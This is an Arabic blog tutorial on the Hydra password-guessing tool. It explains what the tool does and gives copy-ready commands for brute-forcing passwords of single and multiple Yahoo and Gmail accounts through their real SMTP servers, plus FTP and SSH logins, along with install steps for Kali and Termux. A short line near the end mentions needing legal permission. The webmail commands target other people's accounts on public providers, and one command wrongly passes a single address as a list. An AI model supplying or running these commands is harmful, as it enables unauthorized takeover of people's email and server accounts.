أقسام الوصول السريع ( مربع البحث )

أدوات 30 Android 9 Linux 24 news 11 Python 1 Termux 32
أخر الاخبار
0

شرح اداة hydra وكيفية عملها واستخدامها وحل مشاكلها

صورة
Ahmed AL-Nassif
اخر تحديث :
شرح اداة hydra


 


تعتبر أداة Hydra واحدة من أشهر وأفضل الأدوات المستخدمة في اختبار الاختراق واختبار الحماية. تقوم هذه الأداة بتنفيذ هجمات تخمين كلمات المرور بشكل سريع وفعال، مما يجعلها أداة مفيدة لاختبار قوة كلمات المرور وتقييم مدى تحمل النظام لهجمات التخمين.


طريقة عمل أداة Hydra تعتمد على استخدام قائمة كبيرة من الكلمات المحتملة ككلمات مرور محتملة، ومن ثم تقوم بتجربة هذه الكلمات المحتملة على النظام المستهدف. يمكن استخدام Hydra لاختبار كلمات المرور لأي خدمة تتطلب مصادقة، مثل البريد الإلكتروني، واجهات تسجيل الدخول، وغيرها.


تعتبر Hydra أداة قوية ومتعددة الاستخدامات، حيث يمكن استخدامها لاختبار نظام معين أو خدمة بروتوكولية معينة. تدعم Hydra العديد من بروتوكولات الاتصال مثل FTP وSSH وTelnet وSMB وHTTP وHTTPS وغيرها، مما يجعلها أداة مفيدة لاختبار أمان العديد من الأنظمة والخدمات.


طريقة استخدام أداة Hydra تتطلب بعض المعرفة الفنية والخبرة في مجال اختبار الاختراق، حيث يجب فهم كيفية تكوين الأداة واستخدامها بشكل صحيح. بشكل عام، يمكن استخدام Hydra من خلال تحديد الهدف المستهدف ونوع البروتوكول المستخدم، ومن ثم تحديد قائمة الكلمات المرور المحتملة التي سيقوم Hydra بتجربتها.


اداة hydra قوية في الهجوم وسريعة اكثر من باقي الادوات ويوجد بها الكثير من البروتوكولات التي يمكن تخمينها سوف نبداء في بروتوكول smtp

تخمين حسابات yahoo
الأمر
hydra -S -l email@yahoo.com -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp

   لتخمين عدة حسابات
hydra -S -L emaillist.txt -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp


smtp gmail
hydra -S -l email@gmail.com -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp


smtp gmail list email
hydra -S -L email@gmail.com -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp

protocol ftp

hydra -S -l username -P passlist.txt -e ns -V -s 21 (server or ip or host) ftp


protocol ftp list username

hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 21 (server or ip or host) ftp


protocol ssh

hydra -S -l username -P passlist.txt -e ns -V -s 22 (server or ip or host) ssh


protocol ssh list username

hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 22 (server or ip or host) ssh


التثبيت او التنصيب

install hydra
command

Kali Linux (Debian-based)

sudo apt update sudo apt install hydra -y

Termux (Android)

apt update apt install hydra -y

بالإضافة إلى ذلك، يجب أن يكون لديك إذن قانوني لاستخدام أداة Hydra في اختبار أمان أي نظام أو خدمة. يجب استخدام أدوات اختبار الاختراق بشكل قانوني وفقًا للقوانين والأنظمة المحلية والدولية.


في الختام، تعتبر أداة Hydra أحد الأدوات الرئيسية في مجال اختبار الاختراق، وتوفر وسيلة فعالة لاختبار قوة كلمات المرور وتقييم أمان الأنظمة والخدمات. ومع ذلك، يجب استخدامها بحذر وفقًا للقوانين والأنظمة المعمول بها.


 اذا واجهت مشكلة اترك تعليقا
تعديل المقال
تعليقات



    حجم الخط
    +
    16
    -
    تباعد السطور
    +
    2
    -